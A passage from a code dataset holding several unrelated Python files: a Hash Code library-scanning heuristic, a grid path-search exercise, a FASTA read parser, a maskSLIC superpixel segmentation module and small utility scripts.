e)\n\nvariable_test()\nglobal_variable_test1()\nglobal_variable_test2()\nglobal_variable_test3()\n\n","sub_path":"pythonbasic/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111404447","text":"import timeit\nstart = timeit.default_timer()\n\nlibTable = []\nbusy = 0\nbooksProcessed = set()\n\ndef solution(books, libs, days, scores, libDetails, libBooks):\n global libTable, busy\n\n for iL in range(libs):\n libTable.append([iL, False, libDetails[iL][1], 0, set()])\n\n #main processing\n for currday in range(days):\n\n for iL in range(libs):\n if libTable[iL][2] > 0 and libTable[iL][1] == True:\n #print(libTable[iL])\n libTable[iL][2] -= 1\n\n if busy > 0:\n busy -= 1\n \n if busy == 0:\n iL = findBestLib(libDetails, currday, days)\n\n if iL is not None:\n libTable[iL][1] = True\n busy = libDetails[iL][1]\n\n clearBestLibBooksFromOtherLibs(iL, libBooks)\n\n for iL in range(libs):\n if libTable[iL][2] == 0 and libTable[iL][1] == True:\n for ibpd in range(libDetails[iL][2]):\n bestBook = findBestBook(libBooks[iL], scores)\n\n if bestBook is not None:\n booksProcessed.add(bestBook)\n libTable[iL][3] += 1\n libTable[iL][4].add(bestBook)\n #clearScannedBookFromAllLibs(bestBook, libBooks)\n libBooks[iL].discard(bestBook)\n \n print(currday)\n write_file(libBooks, \"temp.out\")\n\n #format final output\n libCount = 0\n for iL in range(libs):\n if libTable[iL][3] > 0:\n libCount += 1\n\n final = []\n final.append([libCount])\n\n for iL in range(libs):\n if libTable[iL][3] > 0:\n final.append([iL, libTable[iL][3]])\n final.append(libTable[iL][4])\n\n #print(final)\n return final\n\n\ndef clearScannedBookFromAllLibs(scannedBook, libBooks):\n\n for books in libBooks:\n books.discard(scannedBook)\n\n\ndef clearBestLibBooksFromOtherLibs(myLibId, libBooks):\n\n for myLibBook in libBooks[myLibId]:\n for iL, books in enumerate(libBooks):\n if iL != myLibId:\n books.discard(myLibBook)\n \n\ndef findBestBook(books, scores):\n global booksProcessed\n\n maxBookPoint = 0\n bestBookId = None\n\n for book in books:\n if True: #book not in booksProcessed:\n if maxBookPoint <= scores[book]:\n maxBookPoint = scores[book]\n bestBookId = book\n\n return bestBookId\n\n\ndef findBestLib(libDetails, currday, days):\n global libTable, busy\n minSignupDays = days\n bestLibIndex = None\n\n for iL, libDetail in enumerate(libDetails):\n if (libTable[iL][1] == False):\n if minSignupDays >= libDetail[1]:\n minSignupDays = libDetail[1]\n bestLibIndex = iL\n\n return bestLibIndex\n\n\ndef read_file(filename):\n \"\"\"Reading input file.\"\"\"\n\n with open(filename, 'r') as fin:\n line = fin.readline()\n books, libs, days = [int(num) for num in line.split()]\n\n line = fin.readline()\n scores = tuple([int(num) for num in line.split()])\n\n libDetails = []\n libBooks = []\n for i in range(0, libs * 2, 2):\n line = fin.readline()\n libDetails.append(tuple([int(num) for num in line.split()]))\n\n line = fin.readline()\n libBooks.append(set([int(num) for num in line.split()]))\n\n return books, libs, days, scores, libDetails, libBooks\n\n\ndef write_file(grid, filename):\n \"\"\"Write output file.\"\"\"\n with open(filename, 'w') as fout:\n for v in grid:\n fout.write(\" \".join(\"\" + str(r) + \"\" for r in v) + '\\n')\n\n\ndef main():\n \"\"\"Main function\"\"\"\n filename = \"b_read_on.txt\"\n\n print('Running on file: %s' % filename)\n\n # read input file\n books, libs, days, scores, libDetails, 
libBooks = read_file(filename)\n try:\n grid_out = solution(books, libs, days, scores, libDetails, libBooks)\n except KeyboardInterrupt:\n pass\n\n # write output file\n write_file(grid_out, \"b.out\")\n print(\"finish\")\n\n\nif __name__ == '__main__':\n main()\n\nprint('Time:', round(timeit.default_timer() - start, 5), \"seconds.\")\n","sub_path":"HC_2020/Qualification_Round/main - b.py","file_name":"main - b.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"71656808","text":"'''\r\nCreated on 22 de dic. de 2016\r\n\r\n@author: DarioRG\r\n'''\r\nimport configparser\r\n\r\n\r\ndef get_url_from_city(city):\r\n ''' Method that loads the url for the parameter city from the configuration file'''\r\n \r\n parser = configparser.SafeConfigParser()\r\n parser.read('maps/processing/url_mapping.ini')\r\n \r\n try:\r\n url = parser['url_mapping'][city]\r\n except Exception:\r\n raise Exception('Error al cargar la url para los datos de: ' + city)\r\n \r\n return url","sub_path":"maps/processing/load_data_url.py","file_name":"load_data_url.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"506122074","text":"# -----------\n# User Instructions:\n#\n# Modify the the search function so that it returns\n# a shortest path as follows:\n# \n# [['>', 'v', ' ', ' ', ' ', ' '],\n# [' ', '>', '>', '>', '>', 'v'],\n# [' ', ' ', ' ', ' ', ' ', 'v'],\n# [' ', ' ', ' ', ' ', ' ', 'v'],\n# [' ', ' ', ' ', ' ', ' ', '*']]\n#\n# Where '>', '<', '^', and 'v' refer to right, left, \n# up, and down motions. Note that the 'v' should be \n# lowercase. '*' should mark the goal cell.\n#\n# You may assume that all test cases for this function\n# will have a path from init to goal.\n# ----------\n\ngrid = [[0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 1, 0]]\ninit = [0, 0]\ngoal = [len(grid)-1, len(grid[0])-1]\ncost = 1\n\ndelta = [[-1, 0 ], # go up\n [ 0, -1], # go left\n [ 1, 0 ], # go down\n [ 0, 1 ]] # go right\n\ndelta_name = ['^', '<', 'v', '>']\n\ndef search(grid,init,goal,cost):\n # ----------------------------------------\n # insert code here\n # ----------------------------------------\n #path = [cost , init[0] , init[1]]\n expand = [[-1 for row in range(len(grid[0]))] for col in range(len(grid))]\n expand[0][0] = 0\n counter = 0\n graph = [[' ' for row in range(len(grid[0]))] for col in range(len(grid))] \n a = len(expand)-1\n b = len(expand[0]) -1 \n graph[a][b] = '*'\n opened = [[0,0,0]]\n visited = []\n while True : \n if len(opened) == 0 : \n return 'fail'\n temp = opened[:]\n for j in range(len(opened)) : \n try : \n cost = opened[j][0]\n init = [opened[j][1] , opened[j][2]]\n except : \n continue\n for i in range(len(delta)) : \n if init[0]+delta[i][0] < 0 or init[0]+delta[i][0] > len(grid) : \n continue \n elif init[1]+delta[i][1] < 0 or init[1]+delta[i][1] > len(grid[0]):\n continue \n try : \n if grid[ init[0]+delta[i][0]][ init[1]+delta[i][1]] == 1 : \n continue\n except : \n continue\n if [init[0]+delta[i][0] , init[1]+delta[i][1] ] in visited : \n continue\n visited.append(init)\n if[cost+1 , init[0]+delta[i][0] , init[1]+delta[i][1]] in opened : \n continue\n if [init[0]+delta[i][0] , init[1]+delta[i][1] ] == goal : \n counter += 1 \n expand[init[0]+delta[i][0]][ init[1]+delta[i][1]] = counter\n goal = expand[a][b]\n while True : \n for k in 
range(len(delta)) : \n if a+delta[k][0] < 0 or a+delta[k][0] > len(expand) :\n continue \n elif b+delta[k][1] < 0 or b+delta[k][1] > len(expand[0]) : \n continue \n try : \n if expand[ a+delta[k][0]][ b+delta[k][1]] == -1 : \n continue\n except : \n continue\n if ( expand[a+delta[k][0]][b+delta[k][1]] < goal ) : \n goal = expand[a+delta[k][0]][b+delta[k][1]] \n tempa = a+delta[k][0]\n tempb = b+delta[k][1]\n tempi = k\n a = tempa\n b = tempb\n graph[a][b] = delta_name[(tempi+2)%4]\n if tempa == 0 and tempb == 0 :\n break\n return graph\n opened.append([cost+1 , init[0]+delta[i][0] , init[1]+delta[i][1]] )\n counter += 1 \n expand[init[0]+delta[i][0]][ init[1]+delta[i][1]] = counter\n \n for i in temp : \n opened.remove(i)\n \nx = search(grid,init,goal,cost)\nfor i in grid :\n print(i)\nfor i in x: \n print(i )\n","sub_path":"4-serach.py","file_name":"4-serach.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"611073199","text":"import sys\r\nimport collections\r\n\r\nimport Data_Class\r\n\r\n# Error message printer and function exit handler \r\ndef crashAndBurn(message):\r\n print(\"Python Script ERROR: \")\r\n print(message)\r\n input(\"Press any key to continue...\")\r\n exit()\r\n\r\n# finds the index of the nth occurrence of sym after the start index in the given string\r\ndef find_nth_char(index, str, sym, n):\r\n if n < 1:\r\n crashAndBurn(\"Input of find_nth_char must be a positive integer.\")\r\n if len(str) < index < 0:\r\n crashAndBurn(\"Index \" + index + \" is invalid for string of length \" + len(str) + \":\\n\\t\" + str)\r\n\r\n while index < len(str):\r\n if str[index] == sym:\r\n if n == 1:\r\n return index\r\n else:\r\n n -= 1\r\n index += 1\r\n \r\n crashAndBurn(\"The \" + n + \"th index of \" + sym + \" was not found in \" + str)\r\n\r\n\r\n\"\"\"\r\nFile Reader opens the fasta and list file, reads each line from them, and returns a \r\ntuple with the read data\r\n\"\"\"\r\nclass File_Reader():\r\n # opens and read the files \r\n def read_files(self, fasta_file_name, list_file_name):\r\n print(\"\\tParsing [\" + fasta_file_name + \"] using [\" + list_file_name + \"].\")\r\n \r\n # open both files for reading:\r\n fasta_file = None\r\n list_file = None\r\n\r\n try:\r\n fasta_file = open(fasta_file_name, \"r\") \r\n list_file = open(list_file_name, \"r\")\r\n\r\n fasta_content = fasta_file.readlines()\r\n list_content = list_file.readlines()\r\n\r\n content_tuple = (fasta_content, list_content)\r\n \r\n finally:\r\n if fasta_file is None:\r\n crashAndBurn(\"Could not open \" + fasta_file_name + \" for reading.\")\r\n if list_file is None:\r\n crashAndBurn(\"Could not open \" + list_file_name + \" for reading.\") \r\n\r\n #close both files, return tuple\r\n fasta_file.close\r\n list_file.close\r\n return content_tuple\r\n\r\n\r\n # checks input arg count and calls read_files\r\n # returns the tuple of read data\r\n def read(self, fasta_file, list_file):\r\n if len(sys.argv) != 4:\r\n crashAndBurn(\"concatQualQuery Usage:\\n\\tconcatQualQuery.py \")\r\n \r\n file_info_tuple = File_Reader.read_files(self, fasta_file, list_file)\r\n return file_info_tuple\r\n\r\n\r\n\"\"\"\r\nFile Parser uses the fasta and list file data and creates a dictionary of the\r\nread names\r\n\"\"\"\r\nclass File_Parser():\r\n def __init__(self):\r\n self.fasta_index = 0\r\n self.list_index = 0\r\n\r\n ############################ FASTA PARSING METHODS ########################\r\n # parses the name of 
the read from the curr index of the fasta lines\r\n def parse_fasta_read_name(self, fasta_line):\r\n start = fasta_line.find(')') + 2\r\n end = find_nth_char(start, fasta_line, ' ', 1)\r\n return fasta_line[start:end]\r\n\r\n # parses the scaffold of the current read header\r\n def parse_scaffold(self, fasta_line):\r\n start = fasta_line.find(' ') + 1\r\n end = fasta_line.find('[') - 3\r\n return fasta_line[start:end]\r\n\r\n # parses the index of the current scaffold in the fasta file\r\n def parse_scaffold_index(self, fasta_line):\r\n start = find_nth_char(0,fasta_line, '(', 2)\r\n end = find_nth_char(start, fasta_line, ')', 1) + 1\r\n return fasta_line[start:end]\r\n \r\n # parses the start index of the scaffold in the current read from its header\r\n def parse_start_index(self, fasta_line):\r\n start = find_nth_char(0, fasta_line, '(', 2) + 2\r\n end = find_nth_char(start, fasta_line, '-', 1) - 1\r\n\r\n start_index_string = fasta_line[start:end]\r\n try:\r\n return int(start_index_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \"\\n\\tHad trouble parsing the start index of the scaffold in its respective read\") \r\n\r\n # parses the end index of the scaffold in the current read from its header\r\n def parse_end_index(self, fasta_line):\r\n start = find_nth_char(0, fasta_line, '(', 2)\r\n start = find_nth_char(start, fasta_line, '-', 1) + 2\r\n end = find_nth_char(start, fasta_line, ')', 1) - 1\r\n\r\n end_index_string = fasta_line[start:end]\r\n try:\r\n return int(end_index_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \"\\n\\tHad trouble parsing the end index of the scaffold in its respective read\")\r\n\r\n # parses the quality of the read\r\n def parse_read_qual(self, fasta_line):\r\n start = find_nth_char(0, fasta_line, ')', 2) + 3\r\n end = find_nth_char(start, fasta_line, '.', 1)\r\n\r\n start_index_string = fasta_line[start:end]\r\n try:\r\n return int(start_index_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \"\\n\\tHad trouble parsing the quality of the scaffold in its respective read\")\r\n\r\n\r\n ######################### LIST PARSING METHODS ############################\r\n #parses the name of the read\r\n def parse_line_read_name(self, list_line):\r\n if list_line[0] != '>':\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[2] \r\n + \" did not begin with a \\'>\\' symbol.\")\r\n\r\n space_index = list_line.find(' ')\r\n if (len(list_line) < space_index < 2):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \" did not follow the format\\n\\t[>Sequence_name num_bases]\")\r\n\r\n name = list_line[1:space_index] \r\n return name\r\n\r\n # parses the number of bases in the given read\r\n def parse_num_bases(self, list_line):\r\n space_index = list_line.find(' ')\r\n if (len(list_line) < space_index < 2):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[2] \r\n + \" did not follow the format\\n\\t[>Sequence_name num_bases]\")\r\n\r\n bases_string = list_line[space_index:]\r\n try:\r\n return int(bases_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[2] \r\n + \" did not have an integer value as its final arg\")\r\n\r\n ######################### General Purpose 
#################################\r\n # fills in the member var data for each new read\r\n def fill_in_data(self, fasta_data, data, fasta_line):\r\n Data_Class.Read_Data.update_read(data,\r\n fasta_data[self.fasta_index + 1],\r\n File_Parser.parse_start_index(self, fasta_line), \r\n File_Parser.parse_end_index(self, fasta_line),\r\n File_Parser.parse_read_qual(self, fasta_line),\r\n self.fasta_index + 1,\r\n sys.argv[1])\r\n \r\n Data_Class.Read_Data.add_scaffold(data, \r\n File_Parser.parse_scaffold(self, fasta_line),\r\n File_Parser.parse_scaffold_index(self, fasta_line))\r\n \r\n # controls the parsing algorithm for each read\r\n def parse(self, info_tuple):\r\n Reads = collections.defaultdict(Data_Class.Read_Data)\r\n discovered_name = File_Parser.parse_fasta_read_name(self, \r\n info_tuple[0][self.fasta_index])\r\n\r\n # iterates through the list file, updates all dictionary indices\r\n while self.list_index < (len(info_tuple[1])):\r\n expected_name = File_Parser.parse_line_read_name(self, info_tuple[1][self.list_index])\r\n bases = File_Parser.parse_num_bases(self, info_tuple[1][self.list_index])\r\n \r\n # set empty data\r\n data = Data_Class.Read_Data(read=[Data_Class.UNKNOWN_BASE] * bases, \r\n scaffolds=[], \r\n scaffold_locations=[],\r\n qualities=[0] * bases, \r\n num_matches=0, \r\n max_index=bases) \r\n \r\n # continue to add scaffolds while the header matches the read name\r\n while (discovered_name == expected_name):\r\n File_Parser.fill_in_data(self, \r\n info_tuple[0], \r\n data, \r\n info_tuple[0][self.fasta_index])\r\n\r\n self.fasta_index += 2 \r\n if self.fasta_index > len(info_tuple[0]) - 1:\r\n break\r\n discovered_name = File_Parser.parse_fasta_read_name(self, \r\n info_tuple[0][self.fasta_index]) \r\n\r\n #print(expected_name)\r\n #Data_Class.Read_Data.print_data(data)\r\n\r\n # add Read_Data var to dictionary \r\n Reads[expected_name] = data \r\n self.list_index += 1\r\n \r\n return Reads\r\n \r\n\r\n'''\r\nWrites the read data to the respective output file\r\n'''\r\nclass File_Writer():\r\n def __init__(self):\r\n self.output = None\r\n\r\n def write(self, read_dict, output_file):\r\n try:\r\n self.output = open(output_file, \"w\")\r\n except IOError:\r\n if self.output is None:\r\n crashAndBurn(\"Could not open \" + self.output + \" for reading.\") \r\n\r\n index = 0 \r\n for read in read_dict:\r\n # write read name\r\n curr = read_dict[read]\r\n self.output.write(\">\" + read)\r\n \r\n # write scaffolds\r\n while index < len(curr.scaffolds):\r\n self.output.write(\" \" + curr.scaffolds[index])\r\n self.output.write(\" \" + curr.scaffold_loc[index])\r\n index += 1\r\n index = 0\r\n\r\n # write match data\r\n if curr.num_matches == 0:\r\n self.output.write(\" read length \" + str(curr.max_index) + \" NOT FOUND\\n\")\r\n else:\r\n self.output.write(\" \" + str(curr.num_matches) + \" of \") \r\n self.output.write(str(curr.max_index) + \" genes match: \") \r\n percent = float(curr.num_matches) / float(curr.max_index) * 100.0\r\n self.output.write(str(percent) + \"%\\n\")\r\n\r\n # write the read itself\r\n for base in curr.read:\r\n self.output.write(base)\r\n\r\n self.output.write(\"\\n\")\r\n self.output.close\r\n\r\n\r\n'''\r\nmain method of Concat Qual Query\r\n'''\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 4:\r\n crashAndBurn(\"concatQualQuery Usage:\\n\\tconcatQualQuery.py \")\r\n\r\n # copy data from files to memory \r\n info_tuple = File_Reader().read(sys.argv[1], sys.argv[2])\r\n \r\n # create a dictionary of that data\r\n try:\r\n read_dict = 
File_Parser().parse(info_tuple)\r\n except:\r\n crashAndBurn(\"There was an issue parsing [\" + sys.argv[1] + \"]\")\r\n \r\n # write the updated data to the output file\r\n File_Writer().write(read_dict, sys.argv[3])\r\n\r\n exit()","sub_path":"CMakeSLAM/CMakeSLAM/PythonScripts/concatQualQuery.py","file_name":"concatQualQuery.py","file_ext":"py","file_size_in_byte":11695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"169369405","text":"\"\"\"\nmaskSLIC: Modified from scikit-image slic method\n\nOriginal code (C) scikit-image\nModification (C) 2016-2019 Benjamin Irving\n\nSee LICENSE.txt for more details\n\"\"\"\n\n# coding=utf-8\nfrom __future__ import division, absolute_import, unicode_literals, print_function\n\nimport warnings\nimport collections as coll\n\nimport numpy as np\n\nfrom scipy import ndimage as ndi\nfrom scipy.ndimage.morphology import distance_transform_edt\nfrom scipy.ndimage.filters import gaussian_filter\n\nfrom skimage.util import img_as_float, regular_grid\nfrom skimage.color import rgb2lab\n\nfrom ._slic import _slic_cython, _enforce_label_connectivity_cython\nfrom .processing import get_mpd\n\ndef place_seed_points(image, mask, n_segments, spacing):\n \"\"\"\n Method for placing seed points in an ROI\n\n Note:\n Optimal point placement problem is somewhat related to the k-center problem\n metric facility location (MFL)\n Maxmin facility location\n https://en.wikipedia.org/wiki/Facility_location_problem\n\n :param image:\n :param mask:\n :param n_segments:\n :param spacing:\n\n :return:\n \"\"\"\n segments_z = np.zeros(n_segments, dtype=np.int64)\n segments_y = np.zeros(n_segments, dtype=np.int64)\n segments_x = np.zeros(n_segments, dtype=np.int64)\n\n m_inv = np.copy(mask)\n\n # Cropping to bounding box around ROI\n nonzero_x, nonzero_y, nonzero_z = np.nonzero(m_inv)\n bbox_start = [np.min(nonzero_x), np.min(nonzero_y), np.min(nonzero_z)]\n bbox_end = [np.max(nonzero_x), np.max(nonzero_y), np.max(nonzero_z)]\n m_inv = m_inv[bbox_start[0]:bbox_end[0]+1, bbox_start[1]:bbox_end[1]+1, bbox_start[2]:bbox_end[2]+1]\n\n # SEED STEP 1: n seeds are placed as far as possible from every other seed and the edge.\n for seg_idx in range(n_segments):\n\n # Distance transform\n dtrans = distance_transform_edt(m_inv, sampling=spacing)\n dtrans = gaussian_filter(dtrans, sigma=0.1)\n\n # Use the maximum locations for the first two points\n coords1 = np.nonzero(dtrans == np.max(dtrans))\n segments_z[seg_idx] = coords1[0][0]\n segments_x[seg_idx] = coords1[1][0]\n segments_y[seg_idx] = coords1[2][0]\n\n # Adding a new point\n m_inv[segments_z[seg_idx], segments_x[seg_idx], segments_y[seg_idx]] = False\n\n segments_z = segments_z + bbox_start[0]\n segments_x = segments_x + bbox_start[1]\n segments_y = segments_y + bbox_start[2]\n\n segments_color = np.zeros((segments_z.shape[0], image.shape[3]))\n segments = np.concatenate([segments_z[..., np.newaxis],\n segments_x[..., np.newaxis],\n segments_y[..., np.newaxis],\n segments_color], axis=1)\n\n segments_z = np.ascontiguousarray(segments_z, dtype=np.int32)\n segments_x = np.ascontiguousarray(segments_x, dtype=np.int32)\n segments_y = np.ascontiguousarray(segments_y, dtype=np.int32)\n\n out1 = get_mpd(segments_z, segments_x, segments_y)\n step_z, step_x, step_y = out1[0], out1[1], out1[2]\n\n return segments, step_x, step_y, step_z\n\ndef slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0,\n seed_type='grid', spacing=None, multichannel=True, convert2lab=None,\n 
enforce_connectivity=False, min_size_factor=0.5, max_size_factor=3,\n slic_zero=False, multifeat=False, return_adjacency=False, mask=None,\n return_segments=False, recompute_seeds=False):\n \"\"\"\n Segments image using k-means clustering in Color-(x,y,z) space.\n\n :param image: 2D, 3D or 4D ndarray\n Input image, which can be 2D or 3D, and grayscale or multichannel\n (see `multichannel` parameter).\n :param n_segments: int, optional\n The (approximate) number of labels in the segmented output image.\n :param compactness: float, optional\n Balances color proximity and space proximity. Higher values give\n more weight to space proximity, making superpixel shapes more\n square/cubic. In SLICO mode, this is the initial compactness.\n This parameter depends strongly on image contrast and on the\n shapes of objects in the image. We recommend exploring possible\n values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before\n refining around a chosen value.\n :param max_iter: int, optional\n Maximum number of iterations of k-means.\n :param sigma: float or (3,) array-like of floats, optional\n Width of Gaussian smoothing kernel for pre-processing for each\n dimension of the image. The same sigma is applied to each dimension in\n case of a scalar value. Zero means no smoothing.\n Note, that `sigma` is automatically scaled if it is scalar and a\n manual voxel spacing is provided (see Notes section).\n :param spacing: (3,) array-like of floats, optional\n The voxel spacing along each image dimension. By default, `slic`\n assumes uniform spacing (same voxel resolution along z, y and x).\n This parameter controls the weights of the distances along z, y,\n and x during k-means clustering.\n :param multichannel: bool, optional\n Whether the last axis of the image is to be interpreted as multiple\n channels or another spatial dimension.\n :param convert2lab: bool, optional\n Whether the input should be converted to Lab colorspace prior to\n maskslic. The input image *must* be RGB. Highly recommended.\n This option defaults to ``True`` when ``multichannel=True`` *and*\n ``image.shape[-1] == 3``.\n :param enforce_connectivity: bool, optional\n Whether the generated segments are connected or not\n :param min_size_factor: float, optional\n Proportion of the minimum segment size to be removed with respect\n to the supposed segment size ```depth*width*height/n_segments```\n :param max_size_factor: float, optional\n Proportion of the maximum connected segment size. A value of 3 works\n in most of the cases.\n :param slic_zero: bool, optional\n Run SLIC-zero, the zero-parameter mode of SLIC. [2]_\n :param mask: ndarray of bools or 0s and 1s, optional\n Array of same shape as `image`. Supervoxel analysis will only be performed on points at\n which mask == True\n\n :return: labels : 2D or 3D array\n Integer mask indicating segment labels.\n\n Raises\n ------\n ValueError\n If ``convert2lab`` is set to ``True`` but the last array\n dimension is not of length 3.\n\n Notes\n -----\n * If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to\n maskslic.\n\n * If `sigma` is scalar and `spacing` is provided, the kernel width is\n divided along each dimension by the spacing. For example, if ``sigma=1``\n and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This\n ensures sensible smoothing for anisotropic images.\n\n * The image is rescaled to be in [0, 1] prior to processing.\n\n * Images of shape (M, N, 3) are interpreted as 2D RGB images by default. 
To\n interpret them as 3D with the last dimension having length 3, use\n `multichannel=False`.\n\n References\n ----------\n .. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi,\n Pascal Fua, and Sabine Susstrunk, SLIC Superpixels Compared to\n State-of-the-art Superpixel Methods, TPAMI, May 2012.\n .. [2] http://ivrg.epfl.ch/research/superpixels#SLICO\n\n Examples\n --------\n >>> from maskslic import slic\n >>> from skimage.data import astronaut\n >>> img = astronaut()\n >>> segments = slic(img, n_segments=100, compactness=10)\n\n Increasing the compactness parameter yields more square regions:\n\n >>> segments = slic(img, n_segments=100, compactness=20)\n\n \"\"\"\n if slic_zero:\n raise NotImplementedError(\"Slic zero has not been implemented yet for maskSLIC.\")\n\n if mask is None and seed_type == 'nplace':\n warnings.warn('nplace assignment of seed points should only be used with an ROI. Changing seed type.')\n seed_type = 'grid'\n\n if seed_type == 'nplace' and recompute_seeds is False:\n warnings.warn('Seeds should be recomputed when seed points are randomly assigned')\n\n image = img_as_float(image)\n is_2d = False\n if image.ndim == 2:\n # 2D grayscale image\n image = image[np.newaxis, ..., np.newaxis]\n is_2d = True\n elif image.ndim == 3 and multichannel:\n # Make 2D multichannel image 3D with depth = 1\n image = image[np.newaxis, ...]\n is_2d = True\n elif image.ndim == 3 and not multichannel:\n # Add channel as single last dimension\n image = image[..., np.newaxis]\n\n if spacing is None:\n spacing = np.ones(3)\n elif isinstance(spacing, (list, tuple)):\n spacing = np.array(spacing, dtype=np.double)\n\n if not isinstance(sigma, coll.Iterable):\n sigma = np.array([sigma, sigma, sigma], dtype=np.double)\n sigma /= spacing.astype(np.double)\n elif isinstance(sigma, (list, tuple)):\n sigma = np.array(sigma, dtype=np.double)\n if (sigma > 0).any():\n # add zero smoothing for multichannel dimension\n sigma = list(sigma) + [0]\n image = ndi.gaussian_filter(image, sigma)\n\n if multichannel and (convert2lab or convert2lab is None):\n if image.shape[-1] != 3 and convert2lab:\n raise ValueError(\"Lab colorspace conversion requires a RGB image.\")\n elif image.shape[-1] == 3:\n image = rgb2lab(image)\n\n if multifeat:\n feat_scale = float(image.shape[3])\n else:\n feat_scale = 1.0\n\n depth, height, width = image.shape[:3]\n\n if mask is None:\n mask = np.ones(image.shape[:3], dtype=np.bool)\n else:\n mask = np.asarray(mask, dtype=np.bool)\n\n if mask.ndim == 2:\n mask = mask[np.newaxis, ...]\n\n if seed_type == 'nplace':\n\n segments, step_x, step_y, step_z = place_seed_points(image, mask, n_segments, spacing)\n\n elif seed_type == 'grid':\n\n # initialize cluster centroids for desired number of segments\n # essentially just outputs the indices of a grid in the x, y and z direction\n grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width]\n # returns 3 slices (an object representing an array of slices, see builtin slice)\n slices = regular_grid(image.shape[:3], n_segments)\n step_z, step_y, step_x = [int(s.step) for s in slices] # extract step size from slices\n segments_z = grid_z[slices] # use slices to extract coordinates for centre points\n segments_y = grid_y[slices]\n segments_x = grid_x[slices]\n\n # list of all locations as well as zeros for the color features\n segments_color = np.zeros(segments_z.shape + (image.shape[3],))\n segments = np.concatenate([segments_z[..., np.newaxis],\n segments_y[..., np.newaxis],\n segments_x[..., np.newaxis],\n 
segments_color],\n                                   axis=-1).reshape(-1, 3 + image.shape[3])\n\n        if mask is not None:\n            ind1 = mask[segments[:, 0].astype('int'), segments[:, 1].astype('int'), segments[:, 2].astype('int')]\n            segments = segments[ind1, :]\n    else:\n        raise ValueError('seed_type should be nplace or grid')\n\n    segments = np.ascontiguousarray(segments)\n\n    # We do the scaling of ratio in the same way as in the SLIC paper\n    # so the values have the same meaning\n    step = float(max((step_z, step_y, step_x)))\n    ratio = 1.0 / compactness\n\n    image = np.ascontiguousarray(image * ratio, dtype=np.double)\n    mask = np.ascontiguousarray(mask, dtype=np.int32)\n\n    #segments_old = np.copy(segments)\n\n    if recompute_seeds:\n        # Seed step 2: Run SLIC to reinitialise seeds\n        # Runs the supervoxel method but only uses distance to better initialise the method\n        labels = _slic_cython(image, mask, segments, step, max_iter, spacing, slic_zero, feat_scale, only_dist=True)\n\n    labels = _slic_cython(image, mask, segments, step, max_iter, spacing, slic_zero, feat_scale, only_dist=False)\n\n    if enforce_connectivity:\n        segment_size = mask.sum() / n_segments\n\n        min_size = int(min_size_factor * segment_size)\n        max_size = int(max_size_factor * segment_size)\n\n        labels = _enforce_label_connectivity_cython(labels, mask, n_segments, min_size, max_size)\n\n    ret = []\n    if is_2d:\n        ret.append(labels[0])\n    else:\n        ret.append(labels)\n\n    if return_adjacency:\n        # Also return adjacency map\n        labels = np.ascontiguousarray(labels, dtype=np.int32)\n        if mask is None:\n            adj_mat, border_mat = _find_adjacency_map(labels)\n        else:\n            adj_mat, border_mat = _find_adjacency_map_mask(labels)\n\n        ret.append(adj_mat)\n        ret.append(border_mat)\n\n    if return_segments:\n        ret.append(segments)\n\n    if len(ret) == 1:\n        return ret[0]\n    else:\n        return tuple(ret)\n","sub_path":"maskslic/slic_superpixels.py","file_name":"slic_superpixels.py","file_ext":"py","file_size_in_byte":13020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"10652462","text":"import random\n\nnum_itens = int(input('Enter the number of items you want in the list: ')) \ncontador = 0\nlista = []\n\nwhile (contador < num_itens):  # '<=' would append one item too many\n    lista.append(random.randrange(0, 1000))\n    contador+=1\nprint('The random list is: ',lista)\nprint('The largest value is: ',max(lista))\nprint('The smallest value is: ',min(lista))","sub_path":"Ex5_Aula3.py","file_name":"Ex5_Aula3.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
